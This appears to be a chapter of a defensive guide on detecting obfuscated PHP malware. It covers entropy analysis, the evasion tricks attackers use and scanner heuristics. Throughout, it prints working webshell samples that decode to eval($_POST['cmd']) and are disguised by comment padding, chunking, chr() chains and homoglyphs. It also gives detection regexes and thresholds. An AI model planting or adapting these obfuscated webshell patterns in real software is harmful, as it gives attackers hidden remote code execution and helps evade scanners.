Beyond signatures: How modern malware evades detection
In Chapter 4, we explored 87 malware signatures. You might think thatβs enough to catch most threats. Itβs not.
Modern attackers know what security scanners look for. Theyβve studied signature databases, analyzed detection algorithms, and developed sophisticated techniques to fly under the radar. This chapter reveals those techniques - and how to defeat them.
The signature problem
Traditional scanners work like this:
1. Load signature database (patterns like "eval(base64_decode(")
2. Read each file
3. Match patterns against content
4. If match found β flag as malware
This approach has a fundamental flaw: attackers can read the same signature databases.
The Arms Race
Every public signature database is a roadmap for attackers. For each signature published, attackers develop two new evasion techniques. This is why signature-only scanners are fighting a losing battle.
What Attackers Do
When an attacker wants to evade eval(base64_decode( detection:
// Original (detected)
eval(base64_decode('ZWNobyAiaGFja2VkIjs='));
// Evasion v1: Variable indirection
$f = 'base64_decode';
$e = 'eval';
$e($f('ZWNobyAiaGFja2VkIjs='));
// Evasion v2: String building
$func = 'bas'.'e64'.'_de'.'code';
$exec = 'ev'.'al';
$exec($func('ZWNobyAiaGFja2VkIjs='));
// Evasion v3: Array chunks (defeats even v2 signatures)
$c = ['ZWNo', 'byAi', 'aGFj', 'a2Vk', 'Ijs='];
$f = implode('', array_map('chr', [98,97,115,101,54,52,95,100,101,99,111,100,101]));
$e = implode('', array_map('chr', [101,118,97,108]));
$e($f(implode('', $c)));
Each version evades more signatures while doing the exact same thing. The behavior is identical; the appearance is different.
Enter entropy analysis
Entropy is a measure of randomness or unpredictability in data. Itβs borrowed from information theory - specifically, Shannon entropy.
Understanding Entropy Intuitively
Think of entropy as measuring βsurpriseβ:
- Low entropy (predictable): βAAAAAAAAAAAAAAAAβ - no surprise, you know what comes next
- Medium entropy (structured): βfunction validateUser($id)β - has patterns but variety
- High entropy (random): β7hK9xQ2mL5nR8pT3β - each character is a surprise
Normal PHP code has medium entropy (4.5-5.5 on a 0-8 scale) because:
- Variable names follow conventions (
$user,$request) - Keywords repeat (
function,return,if) - Structure is predictable (indentation, brackets)
Base64-encoded malware has high entropy (5.8+) because:
- All 64 characters appear with similar frequency
- No recognizable patterns
- Looks like random gibberish
H(X) = -Ξ£ p(x) Γ logβ(p(x))
Where:
- H(X) = entropy of the data
- p(x) = probability of character x appearing
- Ξ£ = sum over all unique characters
For a file with 256 unique byte values appearing equally:
H = -256 Γ (1/256 Γ logβ(1/256)) = 8 bits (maximum entropy) Why Attackers Fear Entropy Scanners
Early entropy scanners caught obfuscated malware easily:
File: malicious.php
Global Entropy: 6.7 (HIGH - SUSPICIOUS)
β Flag for review
But attackers adapted. They developed entropy evasion techniques - ways to artificially lower their malwareβs entropy to look like normal code.
The 5 entropy evasion techniques
Through extensive research, weβve identified five primary techniques attackers use to manipulate entropy:
| Technique | Method | Effect on Entropy |
|---|---|---|
| Comment Padding | Add voluminous repetitive comments | Lowers global entropy |
| Variable Name Engineering | Use predictable, long variable names | Lowers character diversity |
| Chunked Payload | Split payload into small pieces | Distributes high-entropy regions |
| String Steganography | Hide data in invisible characters | Adds entropy invisibly |
| Whitespace Manipulation | Add excessive whitespace | Dilutes entropy calculation |
Letβs examine each one in detail.
Technique 1: Comment padding
Goal: Dilute high-entropy payload with low-entropy comments.
<?php
/*
* This is a legitimate configuration file for the application.
* This is a legitimate configuration file for the application.
* This is a legitimate configuration file for the application.
* This is a legitimate configuration file for the application.
* [... 500 more identical lines ...]
*/
// Configuration settings
// Configuration settings
// Configuration settings
$c = base64_decode('ZXZhbCgkX1BPU1RbJ2NtZCddKTs=');
eval($c);
/*
- End of configuration file.
- End of configuration file.
- End of configuration file.
- End of configuration file.
*/ Why it works: The malicious payload is 2 lines. The padding is 1000+ lines of repetitive, low-entropy text. The global entropy of the file drops from 6.5 to 4.8 - appearing normal.
Detection: CommentPaddingDetector
We counter this by comparing entropy with and without comments:
| Indicator | Threshold | What It Means |
|---|---|---|
| Entropy delta | > 1.5 | Big difference with/without comments |
| Comment ratio | > 60% | File is mostly comments |
| Repetition score | > 40% | Same lines repeated |
| Vocabulary ratio | < 15% | Very few unique words |
// Detection logic
$entropyWithComments = calculateEntropy($content);
$entropyWithout = calculateEntropy(stripComments($content));
$delta = $entropyWithout - $entropyWithComments;
if ($delta > 1.5) {
// Comments are artificially lowering entropy
// Investigate the non-comment code!
}
Real Detection Numbers
In our implementation, we require at least 2 indicators with combined confidence above 40% before flagging. This prevents false positives on legitimately well-documented code.
Technique 2: Variable name engineering
Goal: Use predictable, long variable names to lower character diversity.
<?php
$temporaryDataBufferStorageVariableOne = 'ZX';
$temporaryDataBufferStorageVariableTwo = 'Zh';
$temporaryDataBufferStorageVariableThree = 'bC';
$temporaryDataBufferStorageVariableFour = 'gk';
$temporaryDataBufferStorageVariableFive = 'X1';
$temporaryDataBufferStorageVariableSix = 'BP';
$temporaryDataBufferStorageVariableSeven = 'U1';
$temporaryDataBufferStorageVariableEight = 'Rb';
$temporaryDataBufferStorageVariableNine = 'J2';
$temporaryDataBufferStorageVariableTen = 'Nt';
$resultOutputDataString =
$temporaryDataBufferStorageVariableOne .
$temporaryDataBufferStorageVariableTwo .
$temporaryDataBufferStorageVariableThree .
/_ ... continues ... _/;
$executionFunctionVariable = 'eval';
$decodeFunctionVariable = 'base64_decode';
$executionFunctionVariable($decodeFunctionVariable($resultOutputDataString)); Why it works: The long, repetitive variable names add predictable characters. Words like βtemporaryβ, βDataβ, βBufferβ, βStorageβ, βVariableβ appear constantly, lowering entropy.
Detection: VariableNameEngineeringDetector
| Indicator | Threshold | What It Means |
|---|---|---|
| Average length | > 25 chars | Unusually long variable names |
| Very long count | > 3 variables over 40 chars | Padding behavior |
| Sequential patterns | > 5 numbered vars | $var1, $var2, $var3β¦ |
| Repetitive affixes | > 40% same suffix/prefix | Same endings/beginnings |
Known padding words we look for:
data,buffer,temp,var,string,value,contentresult,output,input,param,arg,item,element
When these words appear repeatedly in variable names, suspicion increases.
Technique 3: Chunked payload distribution
Goal: Break high-entropy payload into small chunks that individually appear normal.
<?php
// Looks like configuration data
$config = [];
$config[] = 'ZX';
$config[] = 'Zh';
$config[] = 'bC';
$config[] = 'gk';
$config[] = 'X1';
$config[] = 'BP';
$config[] = 'U1';
$config[] = 'RF';
$config[] = 'J2';
$config[] = 'Nt';
$config[] = 'ZC';
$config[] = 'dd';
$config[] = 'XS';
$config[] = 'k7';
// Reconstruction - the dangerous part
$payload = implode('', $config);
$fn = chr(101).chr(118).chr(97).chr(108); // "eval"
$fn(base64_decode($payload)); Why it works: Each 2-character chunk has low entropy. A sliding window of 256 bytes wonβt see a concentrated high-entropy region. The payload is distributed across the file.
Detection: ChunkedPayloadDetector
We look for the reconstruction patterns:
| Pattern | Description | Confidence |
|---|---|---|
| Array building | $arr[] = 'xx'; repeated | 70% |
| implode + eval | Reconstruction into execution | 95% |
| implode + base64_decode | Decoding reconstructed string | 90% |
| chr() chains | Building strings from ASCII | 85% |
| Uniform string lengths | All strings same size | 70% |
// Key detection patterns
$dangerousReconstruction = [
'base64_chunks' => '/base64_decode\s*\(\s*implode/',
'gzinflate_chunks' => '/gzinflate\s*\(\s*implode/',
'chr_building' => '/chr\s*\(\s*\d+\s*\)\s*\.\s*chr/',
];
AI Polymorphism Uses This
AI-generated malware heavily uses chunked payloads because each instance can have a different chunk order, different array variable names, and different reconstruction methods. This is why we focus on detecting the reconstruction, not the chunks themselves.
Technique 4: String steganography
Goal: Hide data using invisible Unicode characters or look-alike characters.
Invisible Characters
These Unicode characters are invisible but present in the string:
| Character | Unicode | Name |
|---|---|---|
| β | U+200B | Zero Width Space |
| β | U+200C | Zero Width Non-Joiner |
| β | U+200D | Zero Width Joiner |
| ο»Ώ | U+FEFF | Byte Order Mark |
| Β | U+00AD | Soft Hyphen |
| β | U+2060 | Word Joiner |
<?php
// Looks like a normal string, but contains hidden data
$message = "HelloββββββββWorld"; // ZWSP patterns encode binary
// Decoder extracts binary from invisible char positions
$binary = '';
for ($i = 0; $i < strlen($message); $i++) {
$char = mb_substr($message, $i, 1);
if ($char === "β") $binary .= '0';
if ($char === "β") $binary .= '1';
}
// $binary could be: "01001000" = 'H' = start of payload Homoglyphs
Characters from different scripts that look identical:
| Latin | Cyrillic | They Look The Same |
|---|---|---|
| a | Π° | Yes |
| e | Π΅ | Yes |
| o | ΠΎ | Yes |
| c | Ρ | Yes |
| p | Ρ | Yes |
An attacker could write Π΅val (Cyrillic βΠ΅β) instead of eval (Latin βeβ). Signature scanners looking for eval wonβt match, but PHP might still execute it.
Detection: StringSteganographyDetector
We scan for:
- Invisible characters - Any ZWSP, ZWNJ, BOM, etc.
- Homoglyph mixing - Cyrillic in otherwise Latin text
- Mixed scripts - Latin + Cyrillic + Greek in same string
- Non-printable characters - Control characters hidden in strings
Technique 5: Whitespace manipulation
Goal: Pad file with whitespace to dilute entropy.
<?php
eval(base64_decode('ZXZhbCgkX1BPU1RbJ2NtZCddKTs='));
Why it works: Whitespace characters (space, tab, newline) have low entropy because theyβre all similar. Adding 90% whitespace drops global entropy significantly.
Detection: WhitespaceManipulationDetector
| Indicator | Threshold | Meaning |
|---|---|---|
| Whitespace ratio | > 40% | File is mostly whitespace |
| Entropy delta | > 2.0 | Big difference with/without whitespace |
| Blank line ratio | > 30% | Too many empty lines |
| Consecutive blanks | > 10 | Suspicious padding |
| Low entropy regions | > 3 windows | Concentrated whitespace areas |
The power of sliding window analysis
Global entropy can be manipulated. Local entropy is harder to fake.
Sliding window analysis divides a file into overlapping chunks and measures each oneβs entropy:
File: malicious_padded.php (10000 bytes)
Sliding Window Configuration:
- Window size: 256 bytes
- Step: 64 bytes
- Windows analyzed: ~155
Results:
Window 0-256: Entropy 3.2 (comments/padding)
Window 64-320: Entropy 3.4 (comments/padding)
Window 128-384: Entropy 3.5 (comments/padding)
...
Window 4096-4352: Entropy 6.8 β ANOMALY! Hidden payload
Window 4160-4416: Entropy 6.7 β ANOMALY!
...
Window 9800-10000: Entropy 3.1 (comments/padding)
Global Entropy: 4.2 (appears normal)
But: Local anomalies detected at byte 4096-4500
The global entropy looks normal (4.2), but the sliding window reveals a high-entropy region in the middle - thatβs where the malicious payload is hidden.
Z-Score Anomaly Detection
We use statistical z-scores to find outliers:
// Calculate mean and standard deviation of all windows
$mean = average($windowEntropies);
$stdDev = standardDeviation($windowEntropies);
// Any window more than 2 standard deviations from mean is anomalous
foreach ($windows as $window) {
$zScore = abs($window['entropy'] - $mean) / $stdDev;
if ($zScore > 2.0) {
// This region is statistically abnormal
flagAsAnomaly($window);
}
}
Behavioral analysis: The future
Signatures tell us what code looks like. Behavioral analysis tells us what code does.
The Key Insight
No matter how an attacker obfuscates eval($_POST['cmd']), the behavior
is the same: user input flows to a code execution function. We should detect
the flow, not the appearance.
Data Flow Tracking
Instead of pattern matching, we track how data moves:
User Input Source β Transformation β Dangerous Sink
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
$_GET['x'] β base64_decode β eval()
$_POST['data'] β decrypt() β unserialize()
$_REQUEST['cmd'] β (none) β system()
$_COOKIE['token'] β gzinflate() β assert()
If data flows from any user input to any dangerous sink, we flag it - regardless of how the code looks.
Why This Defeats AI Polymorphism
AI-generated malware changes its appearance every 15-60 seconds:
- Variable names randomized
- Function order shuffled
- String encoding varies
- Comment patterns change
But the behavior stays the same. The malware still needs to:
- Receive attacker commands (input)
- Execute those commands (sink)
Behavioral analysis catches every variant.
Weighted scoring: Combining everything
No single technique is perfect. We combine multiple signals:
| Component | Weight | What It Measures |
|---|---|---|
| Signature matches | 35% | Known malware patterns |
| Behavioral analysis | 25% | Data flow to dangerous sinks |
| Entropy analysis | 15% | Statistical anomalies |
| Structural analysis | 10% | Code structure oddities |
| Context analysis | 15% | File location, naming |
Context Modifiers
Not all detections are equal. We adjust scores based on context:
| Context | Modifier | Reason |
|---|---|---|
vendor/ | -40% | Third-party code, expected patterns |
storage/framework/views/ | -50% | Compiled Blade templates |
bootstrap/cache/ | -45% | Framework cache files |
public/uploads/ | +40% | PHP shouldnβt be here |
.hidden/ | +35% | Suspicious directory |
| Random filename | +20% | x7kd92.php is suspicious |
Confidence Thresholds
Based on final score, we recommend actions:
| Confidence | Action | Automated? |
|---|---|---|
| β₯ 85% | QUARANTINE - Move to isolation, alert admin | Yes |
| 65-84% | REVIEW - Flag for manual inspection | No |
| 40-64% | MONITOR - Add to watchlist | No |
| < 40% | CLEAN - No action needed | - |
The 15-dimensional feature vector
For advanced analysis, we compute 15 statistical features:
Entropy Features (3)
- Global entropy
- Entropy variance across windows
- Entropy range (max - min)
Character Distribution (4)
- Printable character ratio
- Alphabetic ratio
- Digit ratio
- Special character ratio
Code Metrics (3)
- Average line length
- Maximum line length
- Blank line ratio
String Analysis (2)
- Long string count (strings over 100 chars)
- Base64 likelihood score
Function Analysis (3)
- Dangerous function count
- Obfuscation indicator count
- Variable function call count
This 15-dimensional vector provides a fingerprint of the file thatβs difficult to manipulate without changing actual behavior.
Practical implementation
Hereβs how our detection pipeline works:
Input: suspicious.php
β
βΌ
βββββββββββββββββββββββββββββββ
β 1. Quick Filters β Skip: >1MB, non-PHP, vendor/
ββββββββββββββββ¬βββββββββββββββ
β
βΌ
βββββββββββββββββββββββββββββββ
β 2. Signature Scan β 87 patterns from Chapter 4
ββββββββββββββββ¬βββββββββββββββ
β
βΌ
βββββββββββββββββββββββββββββββ
β 3. Entropy Analysis β 5 evasion detectors
β ββ CommentPadding β
β ββ VariableNameEngineering β
β ββ ChunkedPayload β
β ββ StringSteganography β
β ββ WhitespaceManipulation β
ββββββββββββββββ¬βββββββββββββββ
β
βΌ
βββββββββββββββββββββββββββββββ
β 4. Behavioral Analysis β Data flow tracking
ββββββββββββββββ¬βββββββββββββββ
β
βΌ
βββββββββββββββββββββββββββββββ
β 5. Weighted Scoring β Combine all signals
β + Context Modifiers β Adjust for location
ββββββββββββββββ¬βββββββββββββββ
β
βΌ
βββββββββββββββββββββββββββββββ
β 6. Recommendation β QUARANTINE/REVIEW/MONITOR/CLEAN
βββββββββββββββββββββββββββββββ
Summary
Signatures are necessary but insufficient. Modern malware uses sophisticated evasion techniques:
Key takeaways:
- Comment padding, variable engineering, and whitespace manipulation artificially lower entropy
- Chunked payloads distribute high-entropy content across the file
- String steganography hides data in invisible characters
- Sliding window analysis catches local anomalies even when global entropy looks normal
- Behavioral analysis detects what code does, not what it looks like
- Weighted scoring combines multiple signals for accurate detection
- Context modifiers prevent false positives in legitimate framework code
The lesson is clear: layers of defense, not single techniques.
Next: Chapter 6 - The 12 CVEs Every Laravel Developer Must Know
Entropy analysis catches obfuscation. But what about vulnerabilities in Laravel itself? The next chapter covers the critical CVEs every Laravel developer must patch.